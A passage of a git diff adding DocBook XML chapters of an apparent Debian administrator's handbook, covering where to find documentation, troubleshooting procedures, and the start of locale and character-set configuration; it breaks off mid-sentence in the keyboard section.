+    cope with any situation, known or unknown. This chapter gives a number
+    of methods that will — hopefully — allow you to isolate the cause
+    of any problem that you will encounter, so that you may be able to
+    resolve them.</para>
+  </highlights>
+  <section id="sect.documentation-sources">
+    <title>Documentation Sources</title>
+    <indexterm><primary>documentation</primary></indexterm>
+
+    <para>Before you can understand what is really going on when there is a
+    problem, you need to know the theoretical role played by each program
+    involved in the problem. To do this, the best reflex to have is consult
+    their documentation; but since these documentations are many and
+    can be scattered far and wide, you should know all the places where they can be
+    found.</para>
+    <section id="sect.manual-pages">
+      <title>Manual Pages</title>
+      <indexterm><primary><command>man</command></primary></indexterm>
+      <indexterm><primary><command>apropos</command></primary></indexterm>
+      <indexterm><primary>manual pages</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <acronym>RTFM</acronym></title>
+        <indexterm><primary><acronym>RTFM</acronym></primary></indexterm>
+
+	<para>This acronym stands for “Read the F***ing Manual”, but
+	can also be expanded in a friendlier variant, “Read the Fine
+	Manual”. This phrase is sometimes used in (terse) responses to
+	questions from newbies. It is rather abrupt, and betrays a certain
+	annoyance at a question asked by someone who has not even bothered
+	to read the documentation. Some say that this classic response is
+	better than no response at all (since it indicates that the
+	documentation contains the information sought), or than a more
+	verbose and angry answer.</para>
+
+	<para>In any case, if someone responds “RTFM” to you, it is
+	often wise not to take offense. Since this answer may be
+	perceived as vexing, you might want to try and avoid receiving
+	it. If the information that you need is not in the manual,
+	which can happen, you might want to say so, preferably in your
+	initial question. You should also describe the various steps
+	that you have personally taken to find information before you
+	raised a question on a forum. Following Eric Raymond's guidelines
+	is a good way to avoid the most common mistakes and get useful
+	answers.  <ulink type="block" url="http://catb.org/~esr/faqs/smart-questions.html" /></para>
+      </sidebar>
+
+      <para>Manual pages, while relatively terse in style, contain a
+      great deal of essential information. We will quickly go over the
+      command for viewing them. Simply type <command>man
+      <replaceable>manual-page</replaceable></command> — the manual
+      page usually goes by the same name as the command whose
+      documentation is sought. For example, to learn about the
+      possible options for the <command>cp</command> command, you
+      would type the <command>man cp</command> command at the shell
+      prompt (see sidebar <xref linkend="sidebar.shell" />).</para>
+
+      
+      <sidebar id="sidebar.shell">
+        <title><emphasis>BACK TO BASICS</emphasis> The shell, a command line interpreter</title>
+        <indexterm><primary>command line interpreter</primary></indexterm>
+        <indexterm><primary>shell</primary></indexterm>
+
+	<para>A command line interpreter, also called a “shell”, is a
+	program that executes commands that are either entered by the user
+	or stored in a script. In interactive mode, it displays a prompt
+	(usually ending in <literal>$</literal> for a normal user, or by
+	<literal>#</literal> for an administrator) indicating that it is
+	ready to read a new command. <xref linkend="short-remedial-course" /> describes the basics of using the
+	shell.</para>
+
+	<para>The default and most commonly used shell is
+	<command>bash</command> (Bourne Again SHell), but there are others,
+	including <command>dash</command>, <command>csh</command>,
+	<command>tcsh</command> and <command>zsh</command>.</para>
+
+	<para>Among other things, most shells offer help during input at
+	the prompt, such as the completion of command or file names (which
+	you can generally activate by pressing the <keycap>tab</keycap> key), or recalling
+	previous commands (history management).</para>
+      </sidebar>
+
+      <para>Man pages not only document programs accessible from the
+      command line, but also configuration files, system calls, C library
+      functions, and so forth. Sometimes names can collide. For example,
+      the shell's <command>read</command> command has the same name as the
+      <function>read</function> system call. This is why manual pages are
+      organized in numbered sections:</para>
+      <orderedlist>
+        <listitem>
+	  <para>commands that can be executed from the command line;</para>
+        </listitem>
+        <listitem>
+	  <para>system calls (functions provided by the kernel);</para>
+        </listitem>
+        <listitem>
+	  <para>library functions (provided by system libraries);</para>
+        </listitem>
+        <listitem>
+	  <para>devices (on Unix-like systems, these are special files, usually
+	  placed in the <filename>/dev/</filename> directory);</para>
+        </listitem>
+        <listitem>
+	  <para>configuration files (formats and conventions);</para>
+        </listitem>
+        <listitem>
+	  <para>games;</para>
+        </listitem>
+        <listitem>
+	  <para>sets of macros and standards;</para>
+        </listitem>
+        <listitem>
+	  <para>system administration commands;</para>
+        </listitem>
+        <listitem>
+	  <para>kernel routines.</para>
+        </listitem>
+      </orderedlist>
+
+      <para>It is possible to specify the section of the manual page that
+      you are looking for: to view the documentation for the
+      <function>read</function> system call, you would type <command>man 2
+      read</command>. When no section is explicitly specified, the first
+      section that has a manual page with the requested name will be shown.
+      Thus, <command>man shadow</command> returns
+      <citerefentry><refentrytitle>shadow</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+      because there are no manual pages for
+      <foreignphrase>shadow</foreignphrase> in sections 1 to 4.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> <command>whatis</command></title>
+        <indexterm><primary><command>whatis</command></primary></indexterm>
+
+	<para>If you do not want to look at the full manual page, but only
+	a short description to confirm that it is what you are looking for,
+	simply enter <command>whatis
+	<replaceable>command</replaceable></command>.</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>whatis scp</userinput>
+<computeroutput>scp (1)     - secure copy (remote file copy program)</computeroutput>
+</screen>
+
+	<para>This short description is included in the
+	<emphasis>NAME</emphasis> section at the beginning of all manual
+	pages.</para>
+      </sidebar>
+
+      <para>Of course, if you do not know the names of the commands,
+      the manual is not going to be of much use to you. This is the
+      purpose of the <command>apropos</command> command, which helps
+      you conduct a search in the manual pages, or more specifically
+      in their short descriptions. Each manual page begins essentially
+      with a one line summary. <command>apropos</command> returns a
+      list of manual pages whose summary mentions the requested
+      keyword(s). If you choose them well, you will find the name of
+      the command that you need.</para>
+
+      <example>
+        <title>Finding <command>cp</command> with <command>apropos</command></title>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>apropos "copy file"</userinput>
+<computeroutput>cp (1)               - copy files and directories
+cpio (1)             - copy files to and from archives
+gvfs-copy (1)        - Copy files
+gvfs-move (1)        - Copy files
+hcopy (1)            - copy files from or to an HFS volume
+install (1)          - copy files and set attributes
+ntfscp (8)           - copy file to an NTFS volume.
+</computeroutput>
+</screen>
+      </example>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Browsing by following links</title>
+
+	<para>Many manual pages have a “SEE ALSO” section, usually at
+	the end. It refers to other manual pages relevant to similar
+	commands, or to external documentation. In this way, it is possible
+	to find relevant documentation even when the first choice is not
+	optimal.</para>
+      </sidebar>
+
+      <para>The <command>man</command> command is not the only means of
+      consulting the manual pages, since <command>khelpcenter</command>
+      and <command>konqueror</command> (by KDE) and
+      <command>yelp</command> (under GNOME) programs also offer
+      this possibility. There is also a web interface, provided by the
+      <command>man2html</command> package, which allows you to view manual
+      pages in a web browser. On a computer where this package is
+      installed, use this URL: <ulink type="block" url="http://localhost/cgi-bin/man/man2html" /></para>
+
+      <para>This utility requires a web server. This is why you should
+      choose to install this package on one of your servers: all users of
+      the local network could benefit from this service (including
+      non-Linux machines), and this will allow you not to set up an HTTP
+      server on each workstation. If your server is also accessible from
+      other networks, it may be desirable to restrict access to this
+      service only to users of the local network.</para>
+      <indexterm><primary><command>man2html</command></primary></indexterm>
+
+      <para>
+        Last but not least, you can view all manual pages available
+        in Debian (even those that are not installed on your machine) on the
+        <literal>manpages.debian.org</literal> service. It offers each
+        manual page in multiple versions, one for each Debian release.
+        <ulink type="block" url="https://manpages.debian.org" />
+      </para>
+
+      <sidebar>
+        <title><emphasis>DEBIAN POLICY</emphasis> Required man pages</title>
+
+	<para>Debian requires each program to have a manual page. If the
+	upstream author does not provide one, the Debian package maintainer
+	will usually write a minimal page that will at the very least
+	direct the reader to the location of the original
+	documentation.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title><emphasis>info</emphasis> Documents</title>
+      <indexterm><primary><emphasis>info</emphasis></primary></indexterm>
+      <indexterm><primary>GNU</primary><secondary>Info</secondary></indexterm>
+
+      <para>The GNU project has written manuals for most of its programs in
+      the <emphasis>info</emphasis> format; this is why many manual pages
+      refer to the corresponding <emphasis>info</emphasis> documentation.
+      This format offers some advantages, but the default program to view these
+      documents (it is called <command>info</command>) is also slightly more
+      complex. You would be well advised to use <command>pinfo</command>
+      instead (from the <emphasis role="pkg">pinfo</emphasis> package).</para>
+      <indexterm><primary><command>pinfo</command></primary></indexterm>
+
+      <para>The <emphasis>info</emphasis> documentation has a hierarchical
+      structure, and if you invoke <command>pinfo</command> without
+      parameters, it will display a list of the nodes available at the
+      first level. Usually, nodes bear the name of the corresponding
+      commands.</para>
+
+      <para>With <command>pinfo</command> navigating between these nodes
+      is easy to achieve with the arrow keys. Alternatively, you could also
+      use a graphical browser, which is a lot more user-friendly. Again,
+      <command>konqueror</command> and <command>yelp</command> work; the
+      <command>info2www</command> also provides a web interface. <ulink type="block" url="http://localhost/cgi-bin/info2www" /></para>
+      <indexterm><primary><command>info2www</command></primary></indexterm>
+
+      <para>Note that the <emphasis>info</emphasis> system is not suitable for
+      translation, unlike the <command>man</command> page system.
+      <emphasis>info</emphasis> documents are thus almost always in English.
+      However, when you ask the <command>pinfo</command> program to display
+      a non-existing <emphasis>info</emphasis> page, it will fall back on
+      the <emphasis>man</emphasis> page by the same name (if it exists),
+      which might be translated.</para>
+    </section>
+    <section>
+      <title>Specific Documentation</title>
+      <indexterm><primary>documentation</primary></indexterm>
+
+      <para>Each package includes its own documentation. Even the least
+      well documented programs generally have a <filename>README</filename>
+      file containing some interesting and/or important information. This
+      documentation is installed in the
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/</filename>
+      directory (where <replaceable>package</replaceable> represents the
+      name of the package). If the documentation is particularly large, it
+      may not be included in the program's main package, but might be
+      offloaded to a dedicated package which is usually named
+      <literal><replaceable>package</replaceable>-doc</literal>. The main
+      package generally recommends the documentation package so that you
+      can easily find it.</para>
+      <indexterm><primary><filename>README.Debian</filename></primary></indexterm>
+      <indexterm><primary><filename>changelog.Debian.gz</filename></primary></indexterm>
+      <indexterm><primary><filename>NEWS.Debian.gz</filename></primary></indexterm>
+
+      <para>The
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/</filename>
+      directory also contains some files provided by Debian which
+      complete the documentation by specifying the package's
+      particularities or improvements compared to a traditional
+      installation of the software. The <filename>README.Debian</filename>
+      file also indicates all of the adaptations that were made to comply
+      with the Debian Policy. The <filename>changelog.Debian.gz</filename>
+      file allows the user to follow the modifications made to the package
+      over time: it is very useful to try to understand what has changed
+      between two installed versions that do not have the same behavior.
+      Finally, there is sometimes a <filename>NEWS.Debian.gz</filename>
+      file which documents the major changes in the program that may
+      directly concern the administrator.</para>
+    </section>
+    <section>
+      <title>Websites</title>
+
+      <para>In most cases, free software programs have websites that are
+      used to distribute it and to bring together the community of its developers
+      and users. These sites are frequently loaded with relevant
+      information in various forms: official documentation, FAQ (Frequently
+      Asked Questions), mailing list archives, etc.  Problems that
+      you may encounter have often already been the subject of many questions; the FAQ
+      or mailing list archives may have a solution for it. A good mastery
+      of search engines will prove immensely valuable to find relevant
+      pages quickly (by restricting the search to the Internet domain or
+      sub-domain dedicated to the program). If the search returns too many
+      pages or if the results do not match what you seek, you can add the
+      keyword <userinput>debian</userinput> to limit results and target
+      relevant information.</para>
+
+      <sidebar>
+        <title><emphasis>TIPS</emphasis> From error to solution</title>
+
+	<para>If the software returns a very specific error message, enter
+	it into the search engine (between double quotes,
+	<literal>"</literal>, in order to search not for individual
+	keywords, but for the complete phrase). In most cases, the first
+	links returned will contain the answer that you need.</para>
+
+	<para>In other cases, you will get very general errors, such as
+	“Permission denied”. In this case, it is best to check the
+	permissions of the elements involved (files, user ID, groups,
+	etc.).</para>
+      </sidebar>
+
+      <para>If you do not know the address for the software's website,
+      there are various means of getting it. First, check if there is a
+      <literal>Homepage</literal> field in the package's meta-information
+      (<command>apt show
+      <replaceable>package</replaceable></command>). Alternately, the
+      package description may contain a link to the program's official
+      website. If no URL is indicated, look at
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/copyright</filename>.
+      The Debian maintainer generally indicates in this file where they got
+      the program's source code, and this is likely to be the website that
+      you need to find. If at this stage your search is still unfruitful,
+      consult a free software directory, such as FSF's Free Software Directory,
+      or search directly with a search engine, such as Google,
+      DuckDuckGo, Yahoo, etc. <ulink type="block" url="https://directory.fsf.org/wiki/Main_Page" /></para>
+      <indexterm><primary><filename>copyright</filename></primary></indexterm>
+      <indexterm><primary>Free Software Directory</primary></indexterm>
+
+      <para>You might also want to check the Debian wiki, a
+      collaborative website where anybody, even simple visitors, can
+      make suggestions directly from their browsers. It is used
+      equally by developers who design and specify their projects, and
+      by users who share their knowledge by writing documents
+      collaboratively.
+      <ulink type="block" url="http://wiki.debian.org/" /></para>
+      <indexterm><primary><emphasis>wiki.debian.org</emphasis></primary></indexterm>
+    </section>
+    <section>
+      <title>Tutorials (<emphasis>HOWTO</emphasis>)</title>
+      <indexterm><primary><emphasis>HOWTO</emphasis></primary></indexterm>
+
+      <para>A howto is a document that describes, in concrete terms
+      and step by step, “how to” reach a predefined goal. The covered
+      goals are relatively varied, but often technical in nature: for
+      example, setting up IP Masquerading, configuring software RAID,
+      installing a Samba server, etc. These documents often attempt to
+      cover all of the potential problems likely to occur during the
+      implementation of a given technology.</para>
+
+      <para>Many such tutorials are managed by the Linux Documentation
+      Project (LDP), whose website hosts all of these documents:
+      <ulink type="block" url="http://www.tldp.org/" /></para>
+      <indexterm><primary>LDP</primary></indexterm>
+      <indexterm><primary>Linux Documentation Project</primary></indexterm>
+
+      <para>These documents should be taken with a grain of salt. They
+      are often several years old; the information they contain is
+      sometimes obsolete. This phenomenon is even more frequent for
+      their translations, since updates are neither systematic nor
+      instant after the publication of a new version of the original
+      documents. This is part of the joys of working in a volunteer
+      environment and without constraints…</para>
+    </section>
+  </section>
+  <section id="sect.common-procedures">
+    <title>Common Procedures</title>
+    <indexterm><primary>standard procedure</primary></indexterm>
+
+    <para>The purpose of this section is to present some general tips on
+    certain operations that an administrator will frequently have to
+    perform. These procedures will of course not cover every possible case
+    in an exhaustive way, but they may serve as starting points for the
+    more difficult cases.</para>
+
+    <sidebar>
+      <title><emphasis>DISCOVERY</emphasis> Documentation in other languages</title>
+
+      <para>Often, documentation translated into a non-English language is
+      available in a separate package with the name of the corresponding
+      package, followed by
+      <literal>-<replaceable>lang</replaceable></literal> (where
+      <replaceable>lang</replaceable> is the two-letter ISO code for the
+      language).</para>
+
+      <para>For instance, the <emphasis>apt-howto-fr</emphasis>
+      package contains the French translation of the howto for
+      <emphasis>APT</emphasis>.  Likewise, the
+      <emphasis>quick-reference-fr</emphasis> and
+      <emphasis>debian-reference-fr</emphasis> packages are the French
+      versions of the reference guides for Debian (initially written
+      in English by Osamu Aoki).</para>
+    </sidebar>
+    <section>
+      <title>Configuring a Program</title>
+      <indexterm><primary>configuration</primary><secondary>program configuration</secondary></indexterm>
+      <indexterm><primary>program</primary><secondary>configuration</secondary></indexterm>
+
+      <para>When you want to configure an unknown package, you must proceed
+      in stages. First, you should read what the package maintainer has
+      documented. Reading
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/README.Debian</filename>
+      will indeed allow you to learn of specific provisions made to
+      simplify the use of the software. It is sometimes essential in order
+      to understand the differences from the original behavior of the
+      program, as described in the general documentation, such as howtos.
+      Sometimes this file also details the most common errors in order for
+      you to avoid wasting time on common problems.</para>
+
+      <para>Then, you should look at the software's official documentation
+      — refer to <xref linkend="sect.documentation-sources" /> to identify the various existing
+      documentation sources. The <command>dpkg -L
+      <replaceable>package</replaceable></command> command gives a list of files
+      included in the package; you can therefore quickly identify the
+      available documentation (as well as the configuration files, located
+      in <filename>/etc/</filename>). <command>dpkg -s
+      <replaceable>package</replaceable></command> displays the package
+      meta-data and shows any possible recommended or suggested packages; in
+      there, you can find documentation or a utility that will ease the
+      configuration of the software.</para>
+
+      <para>Finally, the configuration files are often self-documented by
+      many explanatory comments detailing the various possible values for
+      each configuration setting. So much so that it is sometimes enough to
+      just choose a line to activate from among those available. In some
+      cases, examples of configuration files are provided in the
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename>
+      directory. They may serve as a basis for your own configuration
+      file.</para>
+
+      <sidebar>
+        <title><emphasis>DEBIAN POLICY</emphasis> Location of examples</title>
+        <indexterm><primary>examples, location</primary></indexterm>
+
+	<para>All examples must be installed in the
+	<filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename>
+	directory. This may be a configuration file, program source code
+	(an example of the use of a library), or a data conversion script
+	that the administrator can use in certain cases (such as to
+	initialize a database). If the example is specific to a particular
+	architecture, it should be installed in
+	<filename>/usr/lib/<replaceable>package</replaceable>/examples/</filename>
+	and there should be a link pointing to that file in the
+	<filename>/usr/share/doc/<replaceable>package</replaceable>/examples/</filename>
+	directory.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Monitoring What Daemons Are Doing</title>
+
+      <para>Understanding what a daemon does is somewhat more
+      complicated, since it does not interact directly with the
+      administrator. To check that a daemon is actually working, you need
+      to test it. For example, to check the Apache (web server) daemon,
+      test it with an HTTP request.</para>
+
+      <para>To allow such tests, each daemon generally records everything
+      that it does, as well as any errors that it encounters, in what are
+      called “log files” or “system logs”. Logs are stored in
+      <filename>/var/log/</filename> or one of its subdirectories. To know
+      the precise name of a log file for each daemon, see its
+      documentation. Note: a single test is not always sufficient if it
+      does not cover all the possible usage cases; some problems only occur
+      in particular circumstances.</para>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> The <command>rsyslogd</command> daemon</title>
+        <indexterm><primary><command>syslogd</command></primary></indexterm>
+        <indexterm><primary>logs</primary><secondary>files</secondary></indexterm>
+        <indexterm><primary>files</primary><secondary>logs</secondary></indexterm>
+
+	<para><command>rsyslogd</command> is special: it collects logs
+	(internal system messages) that are sent to it by other
+	programs.  Each log entry is associated with a subsystem
+	(e-mail, kernel, authentication, etc.) and a priority;
+	<command>rsyslogd</command> processes these two pieces of
+	information to decide on what to do. The log message may be
+	recorded in various log files, and/or sent to an
+	administration console. The details are defined in the
+	<filename>/etc/rsyslog.conf</filename> configuration file
+	(documented in the manual page of the same name).</para>
+
+        <para>Certain C functions, which are specialized in sending logs,
+	simplify the use of the <command>rsyslogd</command> daemon. However
+	some daemons manage their own log files (this is the case, for
+	example, of <command>samba</command>, that implements Windows
+	shares on Linux).</para>
+
+        <para>Note that when <command>systemd</command> is in use, the logs are actually
+        collected by <command>systemd</command> before being forwarded to
+        <command>rsyslogd</command>. They are thus also available via
+        <command>systemd</command>'s journal and can be consulted with
+        <command>journalctl</command> (see <xref linkend="sect.systemd" />
+        for details).</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Daemon</title>
+        <indexterm><primary>daemon</primary></indexterm>
+
+	<para>A daemon is a program that is not explicitly invoked by the
+	user and that stays in the background, waiting for a certain
+	condition to be met before performing a task. Many server programs
+	are daemons, a term that explains that the letter “d” is
+	frequently present at the end of their name
+	(<command>sshd</command>, <command>smtpd</command>,
+	<command>httpd</command>, etc.).</para>
+      </sidebar>
+
+      <para>As a preventive operation, the administrator should
+      regularly read the most relevant server logs. They can thus
+      diagnose problems before they are even reported by disgruntled
+      users.  Indeed users may sometimes wait for a problem to occur
+      repeatedly over several days before reporting it.  In many
+      cases, there are specific tools to analyze the contents of the
+      larger log files.  In particular, such utilities exist for web
+      servers (such as <command>analog</command>,
+      <command>awstats</command>, <command>webalizer</command> for
+      Apache), for FTP servers, for proxy/cache servers, for
+      firewalls, for e-mail servers, for DNS servers, and even for
+      print servers. Other tools, such as
+      <command>logcheck</command> (a software discussed in <xref linkend="security" />), scan these files in search of alerts to
+      be dealt with.</para>
+      <indexterm><primary><command>analog</command></primary></indexterm>
+      <indexterm><primary><command>awtats</command></primary></indexterm>
+      <indexterm><primary><command>webalizer</command></primary></indexterm>
+      <indexterm><primary><command>logcheck</command></primary></indexterm>
+    </section>
+    <section>
+      <title>Asking for Help on a Mailing List</title>
+
+      <para>If your various searches haven't helped you to get to the root
+      of a problem, it is possible to get help from other, perhaps more
+      experienced people. This is exactly the purpose of the
+      <email>debian-user@lists.debian.org</email> mailing list. As with any
+      community, it has rules that need to be followed. Before asking any
+      question, you should check that your problem isn't already covered by
+      recent discussions on the list or by any official documentation.
+      <ulink type="block" url="https://wiki.debian.org/DebianMailingLists" />
+      <ulink type="block" url="https://lists.debian.org/debian-user/" /></para>
+      <indexterm><primary><email>debian-user@lists.debian.org</email></primary></indexterm>
+      <indexterm><primary>mailing lists</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Netiquette applies</title>
+
+	<para>In general, for all correspondence on e-mail lists, the rules
+	of Netiquette should be followed. This term refers to a set of
+	common sense rules, from common courtesy to mistakes that should be
+	avoided. <ulink type="block" url="http://tools.ietf.org/html/rfc1855" />
+	<indexterm><primary>Netiquette</primary></indexterm></para>
+
+        <para>Furthermore, for any communication channel managed by the
+        Debian project, you are bound by the Debian Code of Conduct:
+        <ulink type="block" url="https://www.debian.org/code_of_conduct" /></para>
+      </sidebar>
+
+      <para>Once those two conditions are met, you can think of
+      describing your problem to the mailing list. Include as much relevant
+      information as possible: various tests conducted, documentation
+      consulted, how you attempted to diagnose the problem, the packages
+      concerned or those that may be involved, etc. Check the Debian Bug
+      Tracking System (BTS, described in sidebar <xref linkend="sidebar.bts" />) for similar problems, and mention the results
+      of that search, providing links to bugs found. BTS starts on: <ulink type="block" url="http://www.debian.org/Bugs/index.html" /></para>
+
+      <para>The more courteous and precise you have been, the greater
+      your chances are of getting an answer, or, at least, some
+      elements of response. If you receive relevant information by
+      private e-mail, think of summarizing this information publicly
+      so that others can benefit. This also allows the list's
+      archives, searched through various search engines, to show the
+      resolution for others who may have the same question.</para>
+    </section>
+    <section>
+      <title>Reporting a Bug When a Problem Is Too Difficult</title>
+      <indexterm><primary>report a bug</primary></indexterm>
+      <indexterm><primary>bug report</primary></indexterm>
+
+      <para>If all of your efforts to resolve a problem fail, it is
+      possible that a resolution is not your responsibility, and that the
+      problem is due to a bug in the program. In this case, the proper
+      procedure is to report the bug to Debian or directly to the upstream
+      developers. To do this, isolate the problem as much as possible and
+      create a minimal test situation in which it can be reproduced. If you
+      know which program is the apparent cause of the problem, you can find
+      its corresponding package using the command, <command>dpkg -S
+      <replaceable>file_in_question</replaceable></command>. Check the Bug
+      Tracking System
+      (<literal>https://bugs.debian.org/<replaceable>package</replaceable></literal>)
+      to ensure that the bug has not already been reported. You can then
+      send your own bug report, using the <command>reportbug</command>
+      command, including as much information as possible, especially a
+      complete description of those minimal test cases that will allow
+      anyone to recreate the bug.</para>
+
+      <para>The elements of this chapter are a means of effectively
+      resolving issues that the following chapters may bring about. Use
+      them as often as necessary!</para>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/08_basic-configuration.xml b/tmp/cs-CZ/xml_tmp/08_basic-configuration.xml
new file mode 100644
index 000000000..8c1f89681
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/08_basic-configuration.xml
@@ -0,0 +1,2906 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="basic-configuration">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-basic-configuration.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Configuration</keyword>
+      <keyword>Localization</keyword>
+      <keyword>Locales</keyword>
+      <keyword>Network</keyword>
+      <keyword>Name resolution</keyword>
+      <keyword>Users</keyword>
+      <keyword>Groups</keyword>
+      <keyword>Accounts</keyword>
+      <keyword>Command-line interpreter</keyword>
+      <keyword>Shell</keyword>
+      <keyword>Printing</keyword>
+      <keyword>Bootloader</keyword>
+      <keyword>Kernel compiling</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Basic Configuration: Network, Accounts, Printing...</title>
+  <highlights>
+    <para>A computer with a new installation created with
+    <command>debian-installer</command> is intended to be as functional as
+    possible, but many services still have to be configured. Furthermore,
+    it is always good to know how to change certain configuration elements
+    defined during the initial installation process.</para>
+  </highlights>
+
+  <para>This chapter reviews everything included in what we could call the
+  “basic configuration”: networking, language and locales, users and
+  groups, printing, mount points, etc.</para>
+
+  <section id="sect.config-language-support">
+    <title>Configuring the System for Another Language</title>
+    <indexterm><primary>French localization</primary></indexterm>
+
+    <para>If the system was installed using French, the machine will
+    probably already have French set as the default language. But it is
+    good to know what the installer does to set the language, so that
+    later, if the need arises, you can change it.</para>
+
+    <sidebar>
+      <title><emphasis>TOOL</emphasis> The <command>locale</command> command to display the current configuration</title>
+
+      <para>The <command>locale</command> command lists a summary of the
+      current configuration of various locale parameters (date format,
+      numbers format, etc.), presented in the form of a group of standard
+      environment variables dedicated to the dynamic modification of these
+      settings.</para>
+    </sidebar>
+
+    <section id="sect.default-language">
+      <title>Setting the Default Language</title>
+      <indexterm><primary>locales</primary></indexterm>
+      <indexterm><primary>language</primary></indexterm>
+      <indexterm><primary><command>locale-gen</command></primary></indexterm>
+
+      <para>A locale is a group of regional settings. This includes not
+      only the language for text, but also the format for displaying
+      numbers, dates, times, and monetary sums, as well as the alphabetical
+      comparison rules (to properly account for accented characters).
+      Although each of
+      these parameters can be specified independently from the others, we
+      generally use a locale, which is a coherent set of values for
+      these parameters corresponding to a “region” in the broadest
+      sense. These locales are usually indicated under the form,
+      <literal><replaceable>language-code</replaceable>_<replaceable>COUNTRY-CODE</replaceable></literal>,
+      sometimes with a suffix to specify the character set and encoding to
+      be used. This enables consideration of idiomatic or typographical
+      differences between different regions with a common language.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Character sets</title>
+        <indexterm><primary>character set</primary></indexterm>
+        <indexterm><primary>encoding</primary></indexterm>
+        <indexterm><primary>ISO-8859-1</primary></indexterm>
+        <indexterm><primary>ISO-8859-15</primary></indexterm>
+        <indexterm><primary>Latin 1</primary></indexterm>
+        <indexterm><primary>Latin 9</primary></indexterm>
+
+	<para>Historically, each locale has an associated “character
+	set” (group of known characters) and a preferred “encoding”
+	(internal representation for characters within the computer).</para>
+
+	<para>The most popular encodings for latin-based languages were
+	limited to 256 characters because they opted to use a single byte
+	for each character. Since 256 characters was not enough to cover
+	all European languages, multiple encodings were needed, and
+	that is how we ended up with <emphasis>ISO-8859-1</emphasis>
+	(also known as “Latin 1”) up to <emphasis>ISO-8859-15</emphasis>
+	(also known as “Latin 9”), among others.</para>
+
+	<para>Working with foreign languages often implied regular switches
+	between various encodings and character sets. Furthermore, writing
+	multilingual documents led to further, almost intractable problems.
+	Unicode (a super-catalog of nearly all writing systems from all of
+	the world's languages) was created to work around this problem. One
+	of Unicode's encodings, UTF-8, retains all 128 ASCII symbols (7-bit
+	codes), but handles other characters differently. Those are preceded
+	by a specific escape sequence of a few bits, which implicitly
+	defines the length of the character. This allows encoding all
+	Unicode characters on a sequence of one or more bytes. Its use
+	has been popularized by the fact that it is the default encoding
+	in XML documents.</para>
+        <indexterm><primary>ASCII</primary></indexterm>
+        <indexterm><primary>UTF-8</primary></indexterm>
+        <indexterm><primary>Unicode</primary></indexterm>
+
+	<para>This is the encoding that should generally be used,
+	and is thus the default on Debian systems.</para>
+      </sidebar>
+
+      <para>The <emphasis role="pkg">locales</emphasis> package includes
+      all the elements required for proper functioning of
+      “localization” of various applications. During installation,
+      this package will ask to select a set of supported
+      languages. This set can be changed at any time by running
+      <command>dpkg-reconfigure locales</command> as root.</para>
+
+      <para>The first question invites you to select “locales” to
+      support. Selecting all English locales (meaning those beginning
+      with “<literal>en_</literal>”) is a reasonable choice. Do not
+      hesitate to also enable other locales if the machine will host
+      foreign users. The list of locales enabled on the system is
+      stored in the <filename>/etc/locale.gen</filename> file. It is
+      possible to edit this file by hand, but you should run
+      <command>locale-gen</command> after any modifications. It will
+      generate the necessary files for the added locales to work, and
+      remove any obsolete files.</para>
+
+      <para>The second question, entitled “Default locale for the system environment”,
+      requests a default locale. The recommended choice in the U.S.A. is
+      “<literal>en_US.UTF-8</literal>”. British English speakers will
+      prefer “<literal>en_GB.UTF-8</literal>”, and Canadians will
+      prefer either “<literal>en_CA.UTF-8</literal>” or, for French,
+      “<literal>fr_CA.UTF-8</literal>”. The
+      <filename>/etc/default/locale</filename> file will then be modified
+      to store this choice. From there, it is picked up by all user sessions
+      since PAM will inject its content in the <varname>LANG</varname>
+      environment variable.</para>
+      <indexterm><primary>environment</primary></indexterm>
+      <indexterm><primary>locale</primary></indexterm>
+      <indexterm><primary><varname>LANG</varname></primary></indexterm>
+
+      <sidebar id="sidebar.intro-pam">
+        <title><emphasis>BEHIND THE SCENES</emphasis> <filename>/etc/environment</filename> and <filename>/etc/default/locale</filename></title>
+
+	<para>The <filename>/etc/environment</filename> file provides the
+	<command>login</command>, <command>gdm</command>, or even
+	<command>ssh</command> programs with the correct environment
+	variables to be created.</para>
+
+	<para>These applications do not create these variables directly,
+	but rather via a PAM (<filename>pam_env.so</filename>) module. PAM
+	(Pluggable Authentication Module) is a modular library centralizing
+	the mechanisms for authentication, session initialization, and
+	password management. See <xref linkend="sect.config-pam" /> for
+	an example of PAM configuration.</para>
+
+	<para>The <filename>/etc/default/locale</filename> file works in a
+	similar manner, but contains only the <varname>LANG</varname>
+	environment variable. Thanks to this split, some PAM users can inherit
+	a complete environment without localization. Indeed, it is generally
+	discouraged to run server programs with localization enabled;
+	on the other hand, localization and regional settings are recommended
+	for programs that open user sessions.</para>
+        <indexterm><primary>PAM</primary></indexterm>
+        <indexterm><primary><filename>pam_env.so</filename></primary></indexterm>
+      </sidebar>
+    </section>
+
+    <section id="sect.keyboard-config">
+      <title>Configuring the Keyboard</title>
+      <indexterm><primary>keyboard layout</primary></indexterm>
+      <indexterm><primary>layout, keyboard</primary></indexterm>
+
+      <para>Even if the keyboard layout is managed differently
